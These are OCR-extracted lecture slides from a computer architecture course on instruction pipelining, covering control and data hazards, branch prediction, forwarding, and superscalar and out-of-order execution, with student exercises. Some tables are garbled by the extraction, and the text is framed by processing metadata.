20359, 28], [20359, 20883, 29], [20883, 23149, 30], [23149, 23256, 31], [23256, 23762, 32], [23762, 24629, 33], [24629, 26608, 34], [26608, 26819, 35], [26819, 27506, 36], [27506, 28467, 37], [28467, 29446, 38], [29446, 29851, 39], [29851, 30345, 40], [30345, 30757, 41], [30757, 31005, 42], [31005, 31279, 43], [31279, 31568, 44], [31568, 32146, 45], [32146, 32249, 46], [32249, 32496, 47], [32496, 32780, 48], [32780, 33276, 49], [33276, 33641, 50], [33641, 33902, 51], [33902, 34268, 52], [34268, 34772, 53], [34772, 34986, 54], [34986, 35416, 55], [35416, 35768, 56], [35768, 36242, 57], [36242, 36646, 58], [36646, 37029, 59], [37029, 37232, 60], [37232, 37790, 61], [37790, 38138, 62], [38138, 38318, 63], [38318, 39088, 64]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39088, 0.10565]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
4367d3a97517600e0dda34a0bd41518df9f22002
|
Pipelining
Reducing Instruction Execution Time
Dr. Javier Navaridas
javier.navaridas@manchester.ac.uk
Overview and Learning Outcomes
• Deepen the understanding on how modern processors work
• Learn how pipelining can improve processors performance and efficiency
• Being aware of the problems arising from using pipelined processors
• Understanding instruction dependencies
The Fetch-Execute Cycle
- As explained in COMP15111 Instruction execution is a simple repetitive cycle:
```
LDR R0, x
LDR R1, y
ADD R2, R1, R0
STR R2, Z
...
```
Fetch Instruction
Execute Instruction
Fetch-Execute Detail
The two parts of the cycle can be further subdivided
• Fetch
– Get instruction from memory (IF)
– Decode instruction & select registers (ID)
• Execute
– *Perform operation or calculate address (EX)*
– *Access an operand in data memory (MEM)*
– *Write result to a register (WB)*
We have designed the ‘worst case’ data path
– It works for all instructions
### Processor Detail
#### IF
- Instruction Fetch
#### ID
- Instruction Decode
#### EX
- Execute Instruction
#### MEM
- Access Memory
#### WB
- Write Back
<table>
<thead>
<tr>
<th>Cycle i</th>
<th>Instruction</th>
<th>ID Action</th>
<th>EX Action</th>
<th>MEM Action</th>
<th>WB Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>LDR R0, x</td>
<td>Select register (PC)</td>
<td>Compute address x</td>
<td>Get value from [x]</td>
<td>Write in R0</td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Cycle i+1</th>
<th>Instruction</th>
<th>ID Action</th>
<th>EX Action</th>
<th>MEM Action</th>
<th>WB Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R2,R1,R0</td>
<td>Select registers (R0, R1)</td>
<td>Add R0 & R1</td>
<td>Do nothing</td>
<td>Write in R2</td>
<td></td>
</tr>
</tbody>
</table>
Cycles of Operation
• Most logic circuits are driven by a clock
• In its simplest form one instruction would take one clock cycle (single-cycle processor)
• This is assuming that getting the instruction and accessing data memory can each be done in a $1/5^{th}$ of a cycle (i.e. a cache hit)
• For this part we will assume a perfect cache replacement strategy
Logic to do this
- Each stage will do its work and pass to the next
- Each block is only doing useful work once every $\frac{1}{5}$th of a cycle
### Application Execution
<table>
<thead>
<tr>
<th>Clock Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LDR</strong></td>
<td>IF ID EX MEM WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td><strong>LDR</strong></td>
<td></td>
<td>IF ID EX MEM WB</td>
<td></td>
</tr>
<tr>
<td><strong>ADD</strong></td>
<td></td>
<td></td>
<td>IF ID EX MEM WB</td>
</tr>
</tbody>
</table>
- Can we do it any better?
- Increase utilization
- Accelerate execution
Insert Buffers Between Stages
- Instead of direct connection between stages – use extra buffers to hold state
- Clock buffers once per cycle
In a pipeline processor
• Just like a car production line
• We still can execute one instruction every cycle
• But now clock frequency is increased by 5x
• 5x faster execution!
Clock Cycle
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
</tr>
</thead>
<tbody>
<tr>
<td>LDR</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>LDR</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>ADD</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Benefits of Pipelining
Without Pipelining
<table>
<thead>
<tr>
<th></th>
<th>Clock Cycle</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
<tr>
<td>LDR</td>
<td>IF ID EX MEM WB</td>
</tr>
<tr>
<td>LDR</td>
<td></td>
</tr>
<tr>
<td>ADD</td>
<td></td>
</tr>
</tbody>
</table>
With Pipelining
<table>
<thead>
<tr>
<th></th>
<th>Clock Cycle</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
<tr>
<td>LDR</td>
<td>IF</td>
</tr>
<tr>
<td>LDR</td>
<td>IF</td>
</tr>
<tr>
<td>ADD</td>
<td>IF</td>
</tr>
</tbody>
</table>
Why 5 Stages?
• Simply because early pipelined processors determined that dividing into these 5 stages of roughly equal complexity was appropriate
• Some recent processors have used more than 30 pipeline stages
• We will consider 5 for simplicity at the moment
Imagine we have a non-pipelined processor running at 10MHz and want to run a program with 1000 instructions.
a) How much time would it take to execute the program?
Pipelining Example
Assuming ideal conditions (perfect pipelining and no hazards), how much time would it take to execute the same program in:
b) A 10-stage pipeline?
c) A 100-stage pipeline?
Pipelining Example
Looking at those results, it seems clear that increasing pipeline should increase the execution speed of a processor. Why do you think that processor designers (see Intel, below) have not only stopped increasing pipeline length but, in fact, reduced it?
- **Pentium III – Coppermine (1999)** – 10-stage pipeline
- **Pentium Prescott (2004)** – 31-stage pipeline
- **Core i7 9xx – Bloomfield (2008)** – 24-stage pipeline
- **Core i7 5Yxx – Broadwell (2014)** – 19-stage pipeline
Limits to Pipeline Scalability
• Higher freq. => more power consumed
• More stages
– more extra hardware
– more complex design (forwarding?)
– more difficult to split into uniform size chunks
– loading time of the registers limits cycle period
• Hazards (control and data)
– A longer datapath means higher probability of hazards occurring and worse penalties when they happen
Control Hazards
The Control Transfer Problem
• Instructions are normally fetched sequentially (i.e. just incrementing the PC)
• What if we fetch a branch?
– We only know it is a branch when we decode it in the second stage of the pipeline
– By that time we are already fetching the next instruction in serial order
A Pipeline ‘Bubble’
We must mark Inst 5 as unwanted and ignore it as it goes down the pipeline. But we have wasted a cycle.
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inst 3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>B n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst 5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>...</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
We know it is a branch here. Inst 5 is already fetched.
Conditional Branches
- It gets worse!
- Suppose we have a conditional branch
- It is possible that we might not be able to determine the branch outcome until the execute (3rd) stage
- We would then have 2 ‘bubbles’
- We can often avoid this by reading registers during the decode stage.
Conditional Branches
We do not know whether we have to branch until EX. Inst 5 & 6 are already fetched
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inst 3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>BEQ n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst 5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst 6</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>..</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
If condition is true, we must mark Inst 5 & 6 as unwanted and ignore them as they go down the pipeline. 2 wasted cycles now
Deeper Pipelines
• ‘Bubbles’ due to branches are called **Control Hazards**
• They occur when it takes one or more pipeline stages to detect the branch
• The more stages, the less each does
• More likely to take multiple stages
• Longer pipelines usually suffer more degradation from control hazards
Branch Prediction
• In most programs many branch instructions are executed many times
– E.g. loops, functions
• What if, when a branch is executed
– We **take note** of its address
– We **take note** of the target address
– We use this info the next time the branch is fetched
Branch Target Buffer
• We could do this with some sort of (small) cache
<table>
<thead>
<tr>
<th>Address</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td>Branch Address</td>
<td>Target Address</td>
</tr>
</tbody>
</table>
• As we fetch the branch we check the BTB
• If a valid entry in BTB, we use its target to fetch next instruction (rather than the PC)
Branch Target Buffer
- For unconditional branches we always get it right
- For conditional branches it depends on the probability of repeating the target
- E.g. a ‘for’ loop which jumps back many times we will get it right most of the time (only first and last time will mispredict)
- But it is only a prediction, if we get it wrong we pay a penalty (bubbles)
Outline Implementation
Other Branch Prediction
• BTB is simple to understand
– But expensive to implement
– And it just uses the last branch to predict
• In practice, prediction accuracy depends on
– More history (several previous branches)
– Context (how did we get to this branch)
• Real-world branch predictors are more complex and vital to performance for deep pipelines
Benefits of Branch Prediction
**Without Branch Prediction**
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inst a</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>BEQ n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst c</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst d</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>..</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
The comparison is not done until 3rd stage, so 2 instructions have been issued and need to be eliminated from the pipeline and we have wasted 2 cycles.
**With Branch Prediction**
<table>
<thead>
<tr>
<th></th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
</tr>
</thead>
<tbody>
<tr>
<td>Inst a</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>BEQ n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst c</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst d</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>..</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Inst n</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
If we predict that next instruction will be ‘n’ then we pay no penalty.
Consider a simple program with two nested loops as the following:
```java
while (true) {
for (i=0; i<x; i++) {
do_stuff
}
}
```
With the following assumptions:
- `do_stuff` has 20 instructions that can be executed ideally in the pipeline.
- The overhead for control hazards is 3-cycles, regardless of the branch being static or conditional.
- Each of the two loops can be translated into a single branch instruction.
Calculate the instructions-per-cycle that can be achieved for different values of `x` (2, 4, 10, 100):
a) Without branch prediction.
b) With a simple branch prediction policy - do the same as the last time.
Control Hazard Example
Data Hazards
Data Hazards
• Pipeline can cause other problems
• Consider the following instructions:
ADD R1,R2,R3
MUL R0,R1,R1
• The ADD produces a value in R1
• The MUL uses R1 as input
• There is a data dependency between them
The new value of R1 has not been updated in the register bank
MUL would be reading an outdated value!!
The Data is not Ready
• At the end of the ID cycle, MUL instruction should have selected value in R1 to put into buffer at input to EX stage
• But the correct value for R1 from ADD instruction is being put into the buffer at the output of EX stage at this time
• It will not get to the input of WB until one cycle later – then probably another cycle to write into register bank
Dealing with data dependencies (I)
- Detect dependencies in HW and **hold instructions** in ID stage until data is ready, i.e. **pipeline stall**
- Bubbles and wasted cycles again
<table>
<thead>
<tr>
<th>Clock Cycle</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
</tr>
<tr>
<td>ADD R1,R2,R3</td>
</tr>
<tr>
<td>MUL R0,R1,R1</td>
</tr>
</tbody>
</table>
- Data is produced here
- R1 is written back here
- MUL can not proceed until here
Dealing with data dependencies (II)
- Use the compiler to try and **reorder instructions**
- Only works if we can find something useful to do – otherwise insert NOPs – waste
<table>
<thead>
<tr>
<th>Clock Cycle</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
</tr>
<tr>
<td>ADD R1,R2,R3</td>
</tr>
<tr>
<td>Instr A / NOP</td>
</tr>
<tr>
<td>Instr B / NOP</td>
</tr>
<tr>
<td>MUL R0,R1,R1</td>
</tr>
</tbody>
</table>
36
Forwarding
• We can add extra data paths for specific cases
– The output of EX feeds back into the input of EX
– Sends the data to next instruction
• Control becomes more complex
Why did it Occur?
• Due to the design of our pipeline
• In this case, the result we want is ready one stage ahead (EX) of where it was needed (ID)
– why wait until it goes down the pipeline?
• But, ...what if we have the sequence
LDR R1,[R2,R3]
MUL R0,R1,R1
• LDR = load R1 from memory address R2+R3
– Now the result we want will be ready after MEM stage
Pipeline Sequence for LDR
• Fetch
• Decode and read registers (R2 & R3)
• Execute – add R2+R3 to form address
• Memory access, read from address [R2+R3]
• Now we can write the value into register R1
More Forwarding
- MUL has to wait until LDR finishes MEM
- We need to add extra paths from MEM to EX
- Control becomes even more complex
## Forwarding Example
<table>
<thead>
<tr>
<th></th>
<th>With Forwarding</th>
<th>Without Forwarding</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>1</td>
<td>2</td>
</tr>
<tr>
<td>LDR r1,A</td>
<td>IF</td>
<td>ID</td>
</tr>
<tr>
<td>LDR r2,B</td>
<td>IF</td>
<td>ID</td>
</tr>
<tr>
<td>ADD r3,r1,r2</td>
<td>IF</td>
<td>ID</td>
</tr>
<tr>
<td>ST r3 C</td>
<td>IF</td>
<td>Stall</td>
</tr>
</tbody>
</table>
**Clock Cycle**
With Forwarding:
- Instruction execution flow optimized by forwarding data from one stage to another, reducing stalls and improving overall throughput.
Without Forwarding:
- Standard pipeline stages with occasional stalls due to data dependencies, leading to increased latency.
Diagram highlights the impact of forwarding on reducing stalls and improving efficiency.
Deeper Pipelines
• As mentioned previously we can go to longer pipelines
– Do less per pipeline stage
– Each step takes less time
– So clock frequency increases
– But greater penalty for hazards
– More complex control
• A trade-off between many aspects needs to be made
– Frequency, power, area,
Data Hazard Example
Consider the following program which implements \( R = A^2 + B^2 \)
```
LD r1, A
MUL r2, r1, r1 -- A^2
LD r3, B
MUL r4, r3, r3 -- B^2
ADD r5, r2, r4 -- A^2 + B^2
ST r5, R
```
a) Draw its dependency diagram
b) Simulate its execution in a basic 5-stage pipeline without forwarding.
<table>
<thead>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
<th>10</th>
<th>11</th>
<th>12</th>
<th>13</th>
<th>14</th>
<th>15</th>
<th>16</th>
<th>17</th>
<th>18</th>
<th>19</th>
<th>20</th>
<th>21</th>
<th>22</th>
<th>23</th>
<th>24</th>
</tr>
</thead>
<tbody>
<tr>
<td>LD r1, A</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL r2, r1, r1</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>LD r3, B</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL r4, r3, r3</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ADD r5, r2, r4</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ST r5, R</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
c) Simulate the execution in a 5-stage pipeline with forwarding.
Where Next?
• Despite these difficulties it is possible to build processors which approach 1 instruction per cycle (IPC)
• Given that the computational model is one of serial instruction execution can we do any better than this?
Instruction Level Parallelism
Instruction Level Parallelism (ILP)
• Suppose we have an expression of the form \( x = (a+b) * (c-d) \)
• Assuming \( a, b, c \) & \( d \) are in registers, this might turn into
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
ILP (cont)
• The MUL has a dependence on the ADD and the SUB, and the STR has a dependence on the MUL
• However, the ADD and SUB are independent
• In theory, we could execute them in parallel, even out of order
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
The Dependency Graph
a.k.a. Data Flow graph
• We can see this more clearly if we plot it as a dependency graph (or data flow)
![Diagram of dependency graph with nodes ADD, SUB, and MUL, and inputs R2, R3, R4, R5 leading to output X.]
As long as R2, R3, R4 & R5 are available, we can execute the ADD & SUB in parallel.
Amount of ILP?
- This is obviously a very simple example
- However, real programs often have quite a few independent instructions which could be executed in parallel
- Exact number is clearly program dependent but analysis has shown that 4 is common (in parts of the program anyway)
How to Exploit?
• We need to fetch multiple instructions per cycle – wider instruction fetch
• Need to decode multiple instructions per cycle
• But must use common registers – they are logically the same registers
• Need multiple ALUs for execution
• But also access common data cache
Dual Issue Pipeline
• Two instructions can now execute in parallel
• (Potentially) double the execution rate
• Called a ‘Superscalar’ architecture (2-way)
Register & Cache Access
• Note the access rate to both registers & cache will be doubled
• To cope with this we may need a **dual ported** register bank & **dual ported** caches
• This can be done either by duplicating access circuitry or even duplicating whole register & cache structure
Selecting Instructions
• To get the doubled performance out of this structure, we need to have independent instructions.
• We can have a ‘dispatch unit’ in the fetch stage which uses hardware to examine the instruction dependencies and only issue two in parallel if they are independent.
Instruction dependencies
• If we had
ADD R1,R1,R0
MUL R2,R1,R1
ADD R3,R4,R5
MUL R6,R3,R3
• Issued in pairs as above
• We would not be able to issue any in parallel because of dependencies
Instruction reorder
• If we examine dependencies and reorder
| ADD R1,R1,R0 | ADD R1,R1,R0 |
| MUL R2,R1,R1 | ADD R3,R4,R5 |
| ADD R3,R4,R5 | MUL R2,R1,R1 |
| MUL R6,R3,R3 | MUL R6,R3,R3 |
• We can now execute pairs in parallel (assuming appropriate forwarding logic)
Example of 2-way Superscalar
Dependency Graph
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
MUL R2, R3, R4
STR R2, y
ADD R2, R3
MUL R2, R3
ADD R0, R2, R3
SUB R1, R4, R5
MUL R0, R0, R1
STR R0, x
MUL R2, R3, R4
STR R2, y
## 2-way Superscalar Execution
### Scalar Processor
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Stage 1</th>
<th>Stage 2</th>
<th>Stage 3</th>
<th>Stage 4</th>
<th>Stage 5</th>
<th>Stage 6</th>
<th>Stage 7</th>
<th>Stage 8</th>
<th>Stage 9</th>
<th>Stage 10</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R0, R2, R3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>SUB R1, R4, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL R0, R0, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL R2, R3, R4</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>STR R0, x</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>STR R2, y</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
### Superscalar Processor
<table>
<thead>
<tr>
<th>Instruction</th>
<th>Stage 1</th>
<th>Stage 2</th>
<th>Stage 3</th>
<th>Stage 4</th>
<th>Stage 5</th>
<th>Stage 6</th>
<th>Stage 7</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R0, R2, R3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>SUB R1, R4, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL R0, R0, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>MUL R2, R3, R4</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>STR R0, x</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>STR R2, y</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Limits of ILP
• Modern processors are up to 4 way superscalar (but rarely achieve 4x speed)
• Not much beyond this
– Hardware complexity
– Limited amounts of ILP in real programs
• Limited ILP not surprising, conventional programs are written assuming a serial execution model
Consider the following program which implements $R = A^2 + B^2 + C^2 + D^2$
```
LD r1, A
MUL r2, r1, r1 -- A^2
LD r3, B
MUL r4, r3, r3 -- B^2
ADD r11, r2, r4 -- A^2 + B^2
LD r5, C
MUL r6, r5, r5 -- C^2
LD r7, D
MUL r8, r7, r7 -- D^2
ADD r12, r6, r8 -- C^2 + D^2
ADD r21, r11, r12 -- A^2 + B^2 + C^2 + D^2
ST r21, R
```
The current code is not really suitable for a superscalar pipeline because of its low instruction-level parallelism.
Superscalar Example
a) Reorder the instructions to exploit superscalar execution. Assume all kinds of forwarding are implemented.
Reordering Instructions
Compiler Optimisation
- Reordering can be done by the compiler
- If compiler can not manage to reorder the instructions, we still need hardware to avoid issuing conflicts (stall)
- But if we could rely on the compiler, we could get rid of expensive checking logic
- This is the principle of VLIW (Very Long Instruction Word)[1]
- Compiler must add NOPs if necessary
compiler limitations
- There are arguments against relying on the compiler
- Legacy binaries – optimum code tied to a particular hardware configuration
- ‘Code Bloat’ in VLIW – useless NOPs
- Instead, we can rely on hardware to re-order instructions if necessary
- Out-of-order processors
- Complex but effective
Out of Order Processors
- An instruction buffer needs to be added to store all issued instructions
- An dynamic scheduler is in charge of sending non-conflicted instructions to execute
- Memory and register accesses need to be delayed until all older instructions are finished to comply with application semantics
Out of Order Execution
- What changes in an out-of-order processor
- Instruction Dispatching and Scheduling
- Memory and register accesses deferred
|
{"Source-Url": "http://studentnet.cs.manchester.ac.uk/ugt/2016/COMP25212/lect/pipe.pdf", "len_cl100k_base": 8520, "olmocr-version": "0.1.48", "pdf-total-pages": 66, "total-fallback-pages": 0, "total-input-tokens": 82723, "total-output-tokens": 8536, "length": "2e13", "weborganizer": {"__label__adult": 0.0005564689636230469, "__label__art_design": 0.0007052421569824219, "__label__crime_law": 0.0005636215209960938, "__label__education_jobs": 0.0014629364013671875, "__label__entertainment": 0.0001342296600341797, "__label__fashion_beauty": 0.00027060508728027344, "__label__finance_business": 0.00034737586975097656, "__label__food_dining": 0.0006093978881835938, "__label__games": 0.0011072158813476562, "__label__hardware": 0.031341552734375, "__label__health": 0.00064849853515625, "__label__history": 0.0004265308380126953, "__label__home_hobbies": 0.0003268718719482422, "__label__industrial": 0.0026683807373046875, "__label__literature": 0.00026297569274902344, "__label__politics": 0.0005102157592773438, "__label__religion": 0.0010042190551757812, "__label__science_tech": 0.1771240234375, "__label__social_life": 9.816884994506836e-05, "__label__software": 0.0081634521484375, "__label__software_dev": 0.76953125, "__label__sports_fitness": 0.0005741119384765625, "__label__transportation": 0.0013437271118164062, "__label__travel": 0.000240325927734375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20798, 0.03641]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20798, 0.18021]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20798, 0.82447]], "google_gemma-3-12b-it_contains_pii": [[0, 104, false], [104, 380, null], [380, 583, null], [583, 974, null], [974, 1697, null], [1697, 2058, null], [2058, 2204, null], [2204, 2533, null], [2533, 2675, null], [2675, 3060, null], [3060, 3432, null], [3432, 3696, null], [3696, 3861, null], [3861, 4055, null], [4055, 4609, null], [4609, 4998, null], [4998, 5014, null], [5014, 5319, null], [5319, 5839, null], [5839, 6127, null], [6127, 6661, null], [6661, 6962, null], [6962, 7249, null], [7249, 7532, null], [7532, 7897, null], [7897, 7920, null], [7920, 8283, null], [8283, 9182, null], [9182, 9827, null], [9827, 9850, null], [9850, 9863, null], [9863, 10086, null], [10086, 10189, null], [10189, 10570, null], [10570, 10998, null], [10998, 11420, null], [11420, 11605, null], [11605, 11974, null], [11974, 12174, null], [12174, 12312, null], [12312, 13112, null], [13112, 13422, null], [13422, 13669, null], [13669, 14132, null], [14132, 14363, null], [14363, 14393, null], [14393, 14641, null], [14641, 14923, null], [14923, 15244, null], [15244, 15530, null], [15530, 15816, null], [15816, 15972, null], [15972, 16262, null], [16262, 16552, null], [16552, 16754, null], [16754, 17041, null], [17041, 17286, null], [17286, 18601, null], [18601, 18883, null], [18883, 19328, null], [19328, 19459, null], [19459, 19483, null], [19483, 20008, null], [20008, 20331, null], [20331, 